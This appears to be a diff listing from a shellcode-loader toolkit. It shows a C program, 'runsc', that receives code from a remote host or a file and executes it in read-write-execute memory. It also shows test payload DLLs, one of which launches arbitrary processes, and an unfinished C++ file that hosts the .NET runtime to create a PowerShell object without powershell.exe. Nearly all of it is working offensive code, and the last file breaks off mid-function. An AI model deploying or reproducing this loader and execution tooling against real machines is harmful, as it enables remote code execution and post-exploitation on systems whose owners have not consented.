117 {
118 printf ("[ %s : %s\n", buffer, error);
119 LocalFree (error);
120 } else {
121 printf ("[ %s : %i\n", buffer, dwError);
122 }
123 }
124 #else
125 #define xstrerror printf
126 #endif
127
128 char *addr2ip(args_t *p)
129 {
130 void *src;
131 #ifdef WIN
132 DWORD ip_size=INET6_ADDRSTRLEN;
133 WSAAddressToString (p->ai_addr, p->ai_addrlen,
134 NULL, (char*)p->ip, &ip_size);
135 #else
136 if (p->ai_family==AF_INET) {
137 src=(void*)&p->v4.sin_addr;
138 } else {
139 src=(void*)&p->v6.sin6_addr;
140 }
141 inet_ntop(p->ai_family, src, p->ip, INET6_ADDRSTRLEN);
142 #endif
143 return p->ip;
144 }
145
146 int init_network (args_t *p)
147 /**
148 * PURPOSE : initialize winsock for windows, resolve network address
149 *
150 * RETURN : 1 for okay else 0
151 *
152 * NOTES : None
153 *
154 *F*/
155 {
156 struct addrinfo *list=NULL, *e=NULL;
157 struct addrinfo hints;
158 int r, t;
159
160 // initialize winsock if windows
161 #ifdef WIN
162 WSADATA wsa;
163 WSAStartup (MAKEWORD (2, 0), &wsa);
164 #endif
165
166 r=0;
167 // set network address length to zero
168 p->ai_addrlen = 0;
169
170 // if no address supplied
171 if (p->address==NULL)
172 {
173 // is it ipv4?
174 if (p->ai_family==AF_INET) {
175 p->v4.sin_family = AF_INET;
176 p->v4.sin_port = htons((u_short)p->port_nbr);
177 p->v4.sin_addr.s_addr = INADDR_ANY;
178 p->ai_addr = (struct sockaddr*)&p->v4;
179 p->ai_addrlen = sizeof (struct sockaddr_in);
180 } else {
181 // else it's ipv6
182 p->v6.sin6_family = AF_INET6;
183 p->v6.sin6_port = htons((u_short)p->port_nbr);
184 p->v6.sin6_addr = in6addr_any;
185 p->ai_addr = (struct sockaddr*)&p->v6;
186 p->ai_addrlen = sizeof (struct sockaddr_in6);
187 }
188 } else {
189 memset (&hints, 0, sizeof (hints));
190
191 hints.ai_flags = AI_PASSIVE;
192 hints.ai_family = p->ai_family;
193 hints.ai_socktype = SOCK_STREAM;
194 hints.ai_protocol = IPPROTO_TCP;
195
196 // get all network addresses
197 t=getaddrinfo (p->address, p->port, &hints, &list);
198 if (t == 0)
199 {
200 for (e=list; e!=NULL; e=e->ai_next)
201 {
202 // copy to ipv4 structure
203 if (p->ai_family==AF_INET) {
204 memcpy (&p->v4, e->ai_addr, e->ai_addrlen);
205 p->ai_addr = (struct sockaddr*)&p->v4;
206 } else {
207 // ipv6 structure
208 memcpy (&p->v6, e->ai_addr, e->ai_addrlen);
209 p->ai_addr = (struct sockaddr*)&p->v6;
210 }
211 // assign size of structure
212 p->ai_addrlen = e->ai_addrlen;
213 break;
214 }
215 freeaddrinfo (list);
216 } else {
217 xstrerror ("getaddrinfo");
218 }
219 }
220 return p->ai_addrlen;
221 }
222
223 void debug(void *bin)
224 {
225 //
226 //__builtin_trap();
227 //raise(SIGTRAP);
228 }
229
230 // allocate read/write and executable memory
231 // copy data from p->code and execute
232 void xcode(args_t *p)
233 {
234 void *bin;
235 int i;
236 int fd[2048];
237
238 if (p->code_len == 0) {
239 printf("[ no code to execute.\n");
240 return;
241 }
242 printf ("[ executing code...");
243
244 #ifdef WIN
245 bin=VirtualAlloc (0, p->code_len,
246 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
247 #else
248 bin=mmap (0, p->code_len,
249 PROT_EXEC | PROT_WRITE | PROT_READ,
250 MAP_ANON | MAP_PRIVATE, -1, 0);
251 #endif
252 if (bin!=NULL)
253 {
254 memcpy (bin, p->code, p->code_len);
255 // create file/socket descriptors to simulate real system
256 // created interesting results on openbsd with limits
257 // to how many files could be open at once..
258 //
259 if (p->sim) {
260 #ifndef WIN
261 for (i=0; i<p->sim && p->sim<2048; i++) {
262 fd[i]=socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
263 }
264 #else
265 // todo
266 for (i=0; i<p->sim && p->sim<2048; i++) {
267 }
268 #endif
269 }
270
271 // debug the code?
272 if (p->dbg) {
273 #if defined(_WIN32) || defined(_WIN64)
274 DebugBreak();
275 #else
276 raise(SIGTRAP);
277 #endif
278 }
279 // execute
280 ((void(*)())bin)();
281 printf("OK!\n");
282 if (p->sim) {
283 #ifndef WIN
284 // close all descriptors
285 for (i=0; i<p->sim && p->sim<2048; i++) {
286 close(fd[i]);
287 }
288 #else
289 // todo
290 #endif
291 }
292 #ifdef WIN
293 VirtualFree (bin, 0, MEM_RELEASE | MEM_DECOMMIT);
294 #else
295 munmap (bin, p->code_len);
296 #endif
297 }
298 }
299
300 void send_data(args_t *p, int s) {
301 FILE *fd;
302 int outlen, len, opt;
303 uint32_t sum;
304 uint8_t buf[BUFSIZ];
305
306 // open file for read in binary mode
307 printf ("[ opening %s for read\n", p->file);
308 fd = fopen(p->file, "rb");
309
310 if (fd != NULL)
311 {
312 // send contents of file
313 printf ("[ sending data\n");
314 for (;;) {
315 // read block
316 outlen = fread(buf, sizeof(uint8_t), BUFSIZ, fd);
317 // zero or less indicates EOF
318 if (outlen <= 0) break;
319 // send contents
320 for (sum=0; sum<outlen; sum += len) {
321 len=send (s, &buf[sum], outlen - sum, 0);
322 if (len <= 0) break;
323 }
324 p->code_len += sum;
325 if (outlen != sum) break;
326 }
327 printf ("[ sent %i bytes\n", p->code_len);
328 fclose(fd);
329 }
330 }
331
332 void recv_data(args_t *p, int s) {
333 int opt, r;
334 fd_set fds;
335 struct timeval tv;
336 void *pv;
337
338 p->code_len = 0;
339 p->code = malloc(BUFSIZ);
340
341 // set to non-blocking mode
342 #ifdef WIN
343 opt=1;
344 ioctlsocket (s, FIONBIO, (u_long*)&opt);
345 #else
346 opt=fcntl(s, F_GETFL, 0);
347 fcntl(s, F_SETFL, opt | O_NONBLOCK);
348 #endif
349 // keep reading until remote disconnects or we run out of memory
350 printf ("[ receiving data\n");
351
352 for (;;) {
353 FD_ZERO(&fds);
354 FD_SET(s, &fds);
355
356 tv.tv_sec = 5;
357 tv.tv_usec = 0;
358 r = select(FD_SETSIZE, &fds, 0, 0, &tv);
359
360 if (r <= 0) {
361 printf ("[ waiting for data timed out or failed\n");
362 break;
363 }
364 // receive a block
365 r = recv(s, (uint8_t*)p->code + p->code_len, BUFSIZ, 0);
366 if (r <= 0) break;
367 p->code_len += r;
368 // resize buffer
369 pv = realloc(p->code, p->code_len + BUFSIZ);
370 // on error, free pointer
371 if(pv == NULL) {
372 p->code_len = 0;
373 free(p->code);
374 p->code = NULL;
375 printf("[ error: out of memory.\n");
376 break;
377 }
378 p->code = pv;
379 }
380 if(p->code_len != 0) {
381 printf ("[ received %i bytes\n", p->code_len);
382 }
383 }
384
385 //
386 int ssr (args_t *p)
387 /**
388 * PURPOSE : send a shellcode or receive one from remote system and execute it
389 *
390 * RETURN : 0 or length of shellcode sent/received
391 *
392 * NOTES : None
393 *
394 *F*/
395 {
396 int s, opt, r, t;
397 fd_set fds;
398 struct timeval tv;
399
400 p->code_len=0;
401
402 // create socket
403 printf ("[ creating socket\n");
404 s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
405 if (s < 0) return 0;
406
407 // ensure we can reuse socket
408 t=1;
409 setsockopt (s, SOL_SOCKET, SO_REUSEADDR, (char*)&t, sizeof (t));
410
411 // bind to port
412 printf ("[ binding to port %s\n", p->port);
413 r = bind(s, p->ai_addr, p->ai_addrlen);
414 if (r == 0) {
415 // listen
416 r = listen (s, 1);
417 if (r == 0) {
418 printf ("[ waiting for connections on %s\n", addr2ip(p));
419 if (r == 0) {
420 t = accept(s, p->ai_addr, &p->ai_addrlen);
421 printf ("[ accepting connection from %s\n", addr2ip(p));
422 if (t > 0) {
423 if (p->tx_mode == RSC_SEND) {
424 send_data(p, t);
425 } else {
426 recv_data(p, t);
427 xcode(p);
428 }
429 }
430 }
431 // close socket to peer
432 shutdown(t, SHUT_RDWR);
433 close(t);
434 } else {
435 perror("listen");
436 }
437 } else {
438 perror("bind");
439 }
440 // close listening socket
441 shutdown(s, SHUT_RDWR);
442 close(s);
443
444 return p->code_len;
445 }
446
447 /**F*****************************************************************/
448 int csr (args_t *p)
449 /**
450 * PURPOSE : opens connection to remote system and sends shellcode
451 *
452 * RETURN : 0 or 1
453 *
454 * NOTES : None
455 *
456 *F*/
457 {
458 int s, r, opt;
459 fd_set fds;
460 struct timeval tv;
461
462 printf ("[ creating socket\n");
463 s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
464 if (s < 0) return 0;
465
466 // try connect to remote
467 printf ("[ connecting to %s\n", addr2ip(p));
468 r = connect(s, p->ai_addr, p->ai_addrlen);
469
470 if (r == 0) {
471 if (p->tx_mode==RSC_SEND) {
472 send_data(p, s);
473 } else {
474 recv_data(p, s);
475 xcode(p);
476 }
477 } else {
478 xstrerror("connect");
479 }
480 printf ("[ closing connection\n");
481 shutdown(s, SHUT_RDWR);
482 close(s);
483 return 1;
484 }
485
486 /**F*****************************************************************/
487 void xfile(args_t *p)
488 /**
489 * PURPOSE : read contents of shellcode and attempt to execute it locally
490 *
491 * RETURN : Nothing
492 *
493 * NOTES : None
494 *
495 *F*/
496 {
497 FILE *fd;
498 int len;
499 void *pv;
500
501 p->code_len = 0;
502 p->code = NULL;
503
504 printf ("[ reading code from %s\n", p->file);
505 fd = fopen(p->file, "rb");
506
507 if (fd == NULL) {
508 xstrerror("fopen(\"%s\")", p->file);
509 return;
510 }
511 // read contents of file
512 for (;;) {
513 // first loop? allocate block
514 if(p->code == NULL) {
515 p->code = malloc(BUFSIZ);
516 }
517 // read a block of data
518 len = fread((uint8_t*)p->code + p->code_len, sizeof(uint8_t), BUFSIZ, fd);
519 if (len <= 0) break;
520 p->code_len += len;
521 // resize buffer for next read
522 pv = realloc(p->code, p->code_len + BUFSIZ);
523
524 if(pv == NULL) {
525 p->code_len = 0;
526 free(p->code);
527 p->code = NULL;
528 printf("[ error: out of memory!.\n");
529 break;
530 }
531 p->code = pv;
532 }
533 fclose(fd);
534
535 if(p->code_len != 0) {
536 xcode(p);
537 }
538 }
539
540 #ifdef WIN
541 void load_modules(char *names) {
542 HMODULE mod;
543 char *p = strtok(names, ";,");
544
545 while (p != NULL) {
546 printf ("[ loading %s...", p);
547 mod = LoadLibrary(p);
548
549 printf ("%s\n", mod==NULL ? "FAILED" : "OK");
550
551 p = strtok(NULL, ";,");
552 }
553 }
554 #endif
555
556 /**F*****************************************************************/
557 void usage (void) {
558 printf ("\n usage: runsc <address> [options]\n");
559 printf ("\n -4 Use IP version 4 (default)");
560 printf ("\n -6 Use IP version 6");
561 printf ("\n -l Listen mode (required when listening on specific interface)");
562 #ifdef WIN
563 printf ("\n -m <dll> Loads DLL modules. Each one separated by comma or semi-colon");
564 #endif
565 printf ("\n -f <file> Read PIC from <file>");
566 printf ("\n -s <count> Simulate real process by creating file descriptors");
567 printf ("\n -p <number> Port number to use (default is %s)", DEFAULT_PORT);
568 printf ("\n -x Execute PIC (requires -f)");
569 printf ("\n\n Press any key to continue . . .");
570 getchar ();
571
572 exit (0);
573 }
574
575 /**F*****************************************************************/
576 char* getparam (int argc, char *argv[], int *i) {
577 int n=*i;
578 if (argv[n][2] != 0) {
579 return &argv[n][2];
580 }
581 if ((n+1) < argc) {
582 *i=n+1;
583 return argv[n+1];
584 }
585 printf ("[ %c%c requires parameter\n", argv[n][0], argv[n][1]);
586 exit (0);
587 }
588
589 void parse_args (args_t *p, int argc, char *argv[]) {
590 int i;
591 char opt;
592
593 // for each argument
594 for (i=1; i<argc; i++)
595 {
596 // is this option?
597 if (argv[i][0]=='-' || argv[i][1]=='/')
598 {
599 // get option value
600 opt=argv[i][1];
601 switch (opt)
602 {
603 case '4':
604 p->ai_family=AF_INET;
605 break;
606 case '6': // use ipv6 (default is ipv4)
607 p->ai_family=AF_INET6;
608 break;
609 case 'x': // execute PIC, requires -f
610 p->mode=RSC_EXEC;
611 break;
612 case 'd': // debug the code
613 p->dbg=1;
614 break;
615 case 'f': // file
616 p->file=getparam(argc, argv, &i);
617 break;
618 case 'l': // listen for incoming connections
619 p->mode=RSC_SERVER;
620 break;
621 #ifdef WIN
622 case 'm': // windows only, loads modules required by shellcode
623 p->modules = getparam(argc, argv, &i);
624 break;
625 #endif
626 case 's': // create file descriptors before execution
627 p->sim=atoi(getparam(argc, argv, &i));
628 break;
629 case 'p': // port number
630 p->port=getparam(argc, argv, &i);
631 p->port_nbr=atoi(p->port);
632 break;
633 case '?': // display usage
634 case 'h':
635 usage ();
636 break;
637 default:
638 printf ("[ unknown option %c\n", opt);
639 usage();
640 break;
641 }
642 } else {
643 // assume it's hostname or ip
644 p->address=argv[i];
645 p->mode=RSC_CLIENT;
646 }
647 }
648 }
649
650 int main (int argc, char *argv[]) {
651 args_t args;
652 struct stat st;
653
654 #ifdef WIN
655 //
656 PVOID OldValue=NULL;
657 WSADATA wsa;
658
659 //Wow64DisableWow64FsRedirection (&OldValue);
660 LoadLibrary("ws2_32");
661 LoadLibrary("advapi32");
662
663 WSAStartup(MAKEWORD(2,0), &wsa);
664 #endif
665
666 setbuf(stdout, NULL);
667 setbuf(stderr, NULL);
668
669 memset (&args, 0, sizeof(args));
670
671 // set default parameters
672 args.address = NULL;
673 args.file = NULL;
674 args.ai_family = AF_INET;
675 args.port = DEFAULT_PORT;
676 args.port_nbr = atoi(args.port);
677 args.mode = -1;
678 args.tx_mode = -1;
679 args.sim = 0;
680 args.dbg = 0;
681
682 printf ("\n[ run shellcode v0.2\n");
683
684 parse_args(&args, argc, argv);
685
686 // check if we have file parameter and it accessible
687 if (args.file!=NULL) {
688 if (stat (args.file, &st)) {
689 printf ("[ unable to access %s\n", args.file);
690 return 0;
691 }
692 }
693
694 #ifdef WIN
695 if (args.modules != NULL) {
696 load_modules(args.modules);
697 }
698 #endif
699 // if mode is executing
700 if (args.mode == RSC_EXEC) {
701 if (args.file != NULL) {
702 xfile(&args);
703 return 0;
704 } else {
705 printf ("\n[ you've used -x without supplying file with -f");
706 return 0;
707 }
708 }
709 if (init_network(&args)) {
710 // if no file specified, we receive and execute data
711 args.tx_mode = (args.file==NULL) ? RSC_RECV : RSC_SEND;
712
713 // if mode is -1, we listen for incoming connections
714 if (args.mode == -1) {
715 args.mode=RSC_SERVER;
716 }
717
718 // if no file specified, set to receive one
719 if (args.tx_mode == -1) {
720 args.tx_mode = RSC_RECV;
721 }
722
723 if (args.mode == RSC_SERVER) {
724 ssr (&args);
725 } else {
726 csr (&args);
727 }
728 }
729 if(args.code_len != 0) {
730 free(args.code);
731 }
732 return 0;
733 }
+0
-37
payload/test/api_test.c less more
0
1 #define UNICODE
2 #include <windows.h>
3
4 #include "donut.h"
5 #pragma comment(lib, "user32.lib")
6
7 void call_api(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]);
8 typedef VOID (WINAPI *_DonutApiW)(PWCHAR,PWCHAR,PWCHAR,PWCHAR);
9
10 int main(void) {
11 HMODULE m;
12 _DonutApiW DonutApiW;
13 WCHAR param[4][DONUT_MAX_NAME]={L"arg0",L"arg1",L"arg2",L"arg3"};
14
15 WCHAR msg[4096];
16
17 _snwprintf(msg, ARRAYSIZE(msg),
18 L"param[0] : %ws\r"
19 L"param[1] : %ws\r"
20 L"param[2] : %ws\r"
21 L"param[3] : %ws\r",
22 param[0], param[1], param[2], param[3]);
23
24 MessageBox(NULL, msg, L"Donut Test", MB_OK);
25
26 m = LoadLibrary(L"call_api_dll.dll");
27
28 if(m != NULL) {
29 DonutApiW = (_DonutApiW)GetProcAddress(m, "DonutApiW");
30 if(DonutApiW != NULL) {
31 call_api((FARPROC)DonutApiW, 4, param);
32 }
33 }
34 return 0;
35 }
36
+0
-35
payload/test/call_api_dll.c less more
0 #define WIN32_LEAN_AND_MEAN
1 #define UNICODE
2
3 #include <windows.h>
4 #include "donut.h"
5
6 #pragma comment(lib, "user32.lib")
7
8 __declspec(dllexport)
9 VOID APIENTRY DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
10 WCHAR msg[4096];
11
12 _snwprintf(msg, ARRAYSIZE(msg),
13 L"param[0] : %s\r"
14 L"param[1] : %s\r"
15 L"param[2] : %s\r"
16 L"param[3] : %s\r",
17 arg0, arg1, arg2, arg3);
18
19 MessageBox(NULL, msg, L"Donut Test", MB_OK);
20 }
21
22 __declspec(dllexport)
23 BOOL APIENTRY DllMain(HMODULE hModule,
24 DWORD ul_reason_for_call,
25 LPVOID lpReserved) {
26 switch (ul_reason_for_call) {
27 case DLL_PROCESS_ATTACH:
28 case DLL_THREAD_ATTACH:
29 case DLL_THREAD_DETACH:
30 case DLL_PROCESS_DETACH:
31 break;
32 }
33 return TRUE;
34 }
+0
-56
payload/test/hello.c less more
0 #define UNICODE
1
2 #include <stdint.h>
3 #include <stdio.h>
4 #include <stdlib.h>
5 #include <string.h>
6 #include <sys/stat.h>
7 #include <inttypes.h>
8
9 #include <windows.h>
10 #pragma comment(lib, "user32.lib")
11 #pragma comment(lib, "shell32.lib")
12
13 __declspec(dllexport)
14 VOID WINAPI RunProcess(PWCHAR proc1, PWCHAR proc2) {
15 PROCESS_INFORMATION pi;
16 STARTUPINFO si;
17
18 ZeroMemory(&si, sizeof(si));
19 si.cb = sizeof(si);
20 CreateProcess(NULL, proc1, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
21
22 ZeroMemory(&si, sizeof(si));
23 si.cb = sizeof(si);
24 CreateProcess(NULL, proc2, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
25 }
26
27 __declspec(dllexport)
28 VOID WINAPI DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
29 WCHAR msg[4096];
30
31 _snwprintf(msg, ARRAYSIZE(msg),
32 L"param[0] : %ws\r"
33 L"param[1] : %ws\r"
34 L"param[2] : %ws\r"
35 L"param[3] : %ws\r",
36 arg0, arg1, arg2, arg3);
37
38 MessageBox(NULL, msg, L"Donut Test", MB_OK);
39 }
40
41 __declspec(dllexport)
42 BOOL WINAPI DllMain(HMODULE hModule,
43 DWORD ul_reason_for_call,
44 LPVOID lpReserved) {
45 switch (ul_reason_for_call) {
46 case DLL_PROCESS_ATTACH:
47 MessageBox(NULL, L"Hello, World!", L"Hello, World!", 0);
48 break;
49 case DLL_THREAD_ATTACH:
50 case DLL_THREAD_DETACH:
51 case DLL_PROCESS_DETACH:
52 break;
53 }
54 return TRUE;
55 }
+0
-16
payload/test/hello.cs less more
0 // A Hello World! program in C#.
1 using System;
2 namespace HelloWorld
3 {
4 class Hello
5 {
6 static void Main()
7 {
8 Console.WriteLine("Hello World!");
9
10 // Keep the console window open in debug mode.
11 Console.WriteLine("Press any key to exit.");
12 Console.ReadKey();
13 }
14 }
15 }
+0
-440
payload/test/rdt.cpp less more
0
1 // code to implement hooking ProcessExit from unmanaged code
2 // https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.marshal?view=netframework-4.8
3 //
4 #include <windows.h>
5 #include <oleauto.h>
6 #include <mscoree.h>
7 #include <comdef.h>
8 #include <propvarutil.h>
9 #include <metahost.h>
10
11 #include <cstdio>
12 #include <cstdint>
13 #include <cstring>
14 #include <cstdlib>
15 #include <sys/stat.h>
16
17 #import "mscorlib.tlb" raw_interfaces_only
18 #import "shdocvw.dll"
19
20 #pragma comment(lib, "mscoree.lib")
21
22 void my_function(void *evt) {
23 printf("Received event\n");
24 }
25
26 void DumpMethods(mscorlib::_TypePtr type) {
27 mscorlib::_MethodInfoPtr mi;
28 mscorlib::_ParameterInfoPtr pi;
29 mscorlib::_TypePtr ptype;
30 SAFEARRAY *sa, *params;
31 HRESULT hr;
32 LONG i, j, cnt, pcnt, lcnt, ucnt;
33 BSTR name;
34 VARIANT vt;
35 VARTYPE var;
36
37 hr = type->GetMethods(
38 (mscorlib::BindingFlags)
39 (mscorlib::BindingFlags_Static |
40 mscorlib::BindingFlags_Public),
41 &sa);
42
43 if(hr == S_OK) {
44 SafeArrayGetLBound(sa, 1, &lcnt);
45 SafeArrayGetUBound(sa, 1, &ucnt);
46
47 cnt = (ucnt - lcnt + 1);
48
49 for(i=0; i<cnt; i++) {
50 hr = SafeArrayGetElement(sa, &i, (void*)&mi);
51 if(hr == S_OK) {
52 mi->get_name(&name);
53 printf("%ws(", name);
54 hr = mi->GetParameters(&params);
55 if(hr == S_OK) {
56 SafeArrayGetLBound(params, 1, &lcnt);
57 SafeArrayGetUBound(params, 1, &ucnt);
58
59 pcnt = (ucnt - lcnt + 1);
60 printf("%i", pcnt);
61 for(j=0; j<pcnt; j++) {
62 hr = SafeArrayGetElement(params, &j, (void*)&pi);
63
64 // VARTYPE should be VT_UNKNOWN
65 hr = SafeArrayGetVartype(params, &var);
66 BSTR meth = SysAllocString(L"ParameterType");
67 DISPID id;
68 // hr = pi->GetIDsOfNames(IID_NULL, meth, 1, GetUserDefaultLCID(), &id);
69 //DISPATCH_METHOD, LOCALE_USER_DEFAULT, &id);
70 printf("HRESULT : %lx\n", hr);
71 }
72 }
73 printf(")\n");
74 }
75 }
76 }
77 }
78
79 void rundotnet(void *code, size_t len) {
80 HRESULT hr;
81 ICLRMetaHost *icmh;
82 ICLRRuntimeInfo *icri;
83 ICorRuntimeHost *icrh;
84 IUnknownPtr iu;
85 mscorlib::_AppDomainPtr ad;
86 mscorlib::_AssemblyPtr as, as1, as2, as3;
87 mscorlib::_MethodInfoPtr mi;
88 mscorlib::_EventInfoPtr nfo;
89 mscorlib::_TypePtr evt, ptr, type, mars, del, _void, powershell;
90 mscorlib::_DelegatePtr delegate;
91 mscorlib::_ParameterInfoPtr param;
92 mscorlib::_EventHandlerPtr handler;
93 VARIANT v1, v2, v_ptr, v_type, ret;
94 SAFEARRAY *sa, *sa2, *sav;
95 SAFEARRAYBOUND sab;
96 BOOL loadable;
97 LONG idx;
98
99 printf("CoCreateInstance(ICorRuntimeHost).\n");
100
101 hr = CLRCreateInstance(
102 CLSID_CLRMetaHost,
103 IID_ICLRMetaHost,
104 (LPVOID*)&icmh);
105
106 if(SUCCEEDED(hr)) {
107 printf("ICLRMetaHost::GetRuntime\n");
108
109 hr = icmh->GetRuntime(
110 L"v4.0.30319",
111 IID_ICLRRuntimeInfo, (LPVOID*)&icri);
112
113 if(SUCCEEDED(hr)) {
114 printf("ICLRRuntimeInfo::IsLoadable\n");
115 hr = icri->IsLoadable(&loadable);
116
117 if(SUCCEEDED(hr) && loadable) {
118 printf("ICLRRuntimeInfo::GetInterface\n");
119
120 hr = icri->GetInterface(
121 CLSID_CorRuntimeHost,
122 IID_ICorRuntimeHost,
123 (LPVOID*)&icrh);
124 } else return;
125 } else return;
126 } else return;
127
128 printf("ICorRuntimeHost::Start()\n");
129 hr = icrh->Start();
130 if(SUCCEEDED(hr)) {
131 printf("ICorRuntimeHost::GetDefaultDomain()\n");
132 hr = icrh->GetDefaultDomain(&iu);
133 if(SUCCEEDED(hr)) {
134 printf("IUnknown::QueryInterface()\n");
135 hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
136 if(SUCCEEDED(hr)) {
137 BSTR strX = SysAllocString(L"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
138 // ([system.reflection.assembly]::loadfile("C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll")).FullName
139 BSTR str1 = SysAllocString(L"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35");
140
141 BSTR str2 = SysAllocString(L"mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089");
142
143 hr = ad->Load_2(str1, &as1); // load automation
144 hr = ad->Load_2(strX, &as3); // load interop services
145 printf("Loading System.Management.Automation : %lx\n", hr);
146 hr = ad->Load_2(str2, &as2); // load mscorlib
147
148 BSTR alloc = SysAllocString(L"Create");
149 BSTR marshal = SysAllocString(L"System.Management.Automation.PowerShell");
150 hr = as1->GetType_2(marshal, &mars);
151
152 printf("GetType_2(PowerShell) : %lx %p\n", hr, (PVOID)mars);
153
154 DumpMethods(mars);
155
156 // to retrieve a method, the SAFEARRAY is of IUnknown types
157 // this method doesn't accept anything, so just allocate array for it
158 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 0);
159
160 hr = mars->GetMethod(alloc,
161 (mscorlib::BindingFlags)
162 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
163 NULL, // Binder
164 sav, // SAFEARRAY(_Type*)
165 NULL, // Modifiers
166 &mi); // MethodInfo
167
168 printf("System.Management.Automation.PowerShell.GetMethod(Create) : %lx : %p\n", hr, (PVOID)mi);
169
170 v1.vt = VT_EMPTY;
171 VariantClear(&ret);
172
173 hr = mi->Invoke_3(
174 v1,
175 NULL, // arguments to method
176 &ret); // return value from method
177
178 printf("%lx %p %i %i\n", hr, (LPVOID)ret.punkVal, V_VT(&ret), GetLastError());
179
180 // at this point, we have the powershell object. we just need to call AddScript
181 // method, but this is an IDisposable
182
183 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
184 BSTR object = SysAllocString(L"System.Object");
185
186 as2->GetType_2(object, &ptr);
187 idx = 0;
188 SafeArrayPutElement(sav, &idx, ptr);
189
190 BSTR get_obj = SysAllocString(L"GetIUnknownForObject");
191 BSTR mars_str = SysAllocString(L"System.Runtime.InteropServices.Marshal");
192 hr = as3->GetType_2(mars_str, &mars);
193
194 printf("Marshal : %p\n", (PVOID)mars);
195
196 hr = mars->GetMethod(get_obj,
197 (mscorlib::BindingFlags)
198 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
199 NULL, // Binder
200 sav, // SAFEARRAY(_Type*)
201 NULL, // Modifiers
202 &mi); // MethodInfo
203
204 printf("GetMethod() : %lx %p\n", hr, (PVOID)mi);
205
206 sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
207 idx = 0;
208 SafeArrayPutElement(sav, &idx, &ret.punkVal);
209
210 v1.vt = VT_EMPTY;
211 VARIANT unk;
212 VariantClear(&unk);
213
214 hr = mi->Invoke_3(
215 v1,
216 sav, // arguments to method
217 &unk); // return value from method
218
219 printf("%lx %p\n", hr, (LPVOID)V_BYREF(&unk));
220 getchar();
221 return;
222
223 // SAFEARRAY(_Type*)
224 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 2);
225
226 // add System.IntPtr
227 BSTR str4 = SysAllocString(L"System.IntPtr");
228 as2->GetType_2(str4, &ptr);
229 //DumpMethods(ptr);
230 idx = 0;
231 hr = SafeArrayPutElement(sav, &idx, ptr);
232
233 // add System.Type
234 BSTR str5 = SysAllocString(L"System.Type");
235 as2->GetType_2(str5, &type);
236 idx = 1;
237 SafeArrayPutElement(sav, &idx, type);
238
239 BSTR str6 = SysAllocString(L"GetIUnknownForObject");
240 BSTR str3 = SysAllocString(L"System.Runtime.InteropServices.Marshal");
241 hr = as1->GetType_2(str3, &mars);
242
243 hr = mars->GetMethod(str6,
244 (mscorlib::BindingFlags)
245 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
246 NULL, // Binder
247 sav, // SAFEARRAY(_Type*)
248 NULL, // Modifiers
249 &mi); // MethodInfo
250
251 printf("\nGetMethod(GetDelegateForFunctionPointer) HRESULT : %08lx MethodInfoPtr : %p\n", hr, (void*)mi);
252
253 BSTR str9 = SysAllocString(L"ProcessExit");
254 BSTR strA = SysAllocString(L"System.AppDomain");
255
256 hr = as2->GetType_2(strA, &evt);
257 printf("GetType_2(System.AppDomain) HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
258
259 hr = evt->GetEvent(str9,
260 (mscorlib::BindingFlags)
261 (mscorlib::BindingFlags_Instance | mscorlib::BindingFlags_Public),
262 &nfo);
263
264 printf("GetEvent(ProcessExit) HRESULT : %08lx EventInfoPtr : %p\n", hr, (void*)nfo);
265
266 hr = nfo->get_EventHandlerType(&evt);
267 printf("EventHandlerType(ProcessExit) : HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
268
269 BSTR type_name, base_name;
270 mscorlib::_TypePtr base_type, ref_type;
271
272 evt->get_name(&type_name);
273 evt->get_BaseType(&base_type);
274 base_type->get_name(&base_name);
275
276 wprintf(L"Event Type : %s\nBase Type : %s\n", type_name, base_name);
277
278 printf("my_function = %p\n", (void*)my_function);
279
280 // SAFEARRAY(VARIANT)
281 sav = SafeArrayCreateVector(VT_VARIANT, 0, 2);
282
283 VariantClear(&v_ptr);
284 V_BYREF(&v_ptr) = (PVOID)my_function;
285 V_VT(&v_ptr) = VT_INT;
286
287 idx = 0;
288 SafeArrayPutElement(sav, &idx, &v_ptr);
289
290 BSTR strZ = SysAllocString(L"System.MultiDelegate");
291 hr = as2->GetType_2(strZ, &type);
292 printf("System.Delegate = %lx, %p\n", hr, (void*)type);
293
294 idx = 1;
295 V_VT(&v_type) = VT_UNKNOWN;
296 V_UNKNOWN(&v_type) = type;
297 SafeArrayPutElement(sav, &idx, &type);
298
299 v1.vt = VT_EMPTY;
300 VariantClear(&ret);
301
302 printf("Calling GetDelegateForFunctionPointer\n");
303 hr = mi->Invoke_3(
304 v1,
305 sav, // arguments to method
306 &ret); // return value from method
307
308 printf("Invoke_3(GetDelegateForFunctionPointer) HRESULT : %08lx : %x : %p\n", hr, V_VT(&ret), V_BYREF(&ret));
309
310 /**if(hr != S_OK) {
311 printf("Failed to obtain delegate\n");
312 return;
313 }*/
314
315 printf("Delegate : %p\n", ret.punkVal);
316
317 hr = ret.punkVal->QueryInterface(IID_IUnknown, (void**)&handler);
318 printf("HRESULT : %08lx : %p\n", hr, (void*)handler);
319
